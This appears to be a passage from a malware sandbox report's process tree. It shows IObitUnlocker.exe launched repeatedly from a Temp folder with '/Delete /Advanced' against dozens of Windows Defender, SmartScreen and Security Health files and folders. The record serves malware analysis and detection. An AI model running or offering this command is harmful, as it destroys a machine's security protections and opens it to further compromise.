                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11452
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:12120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 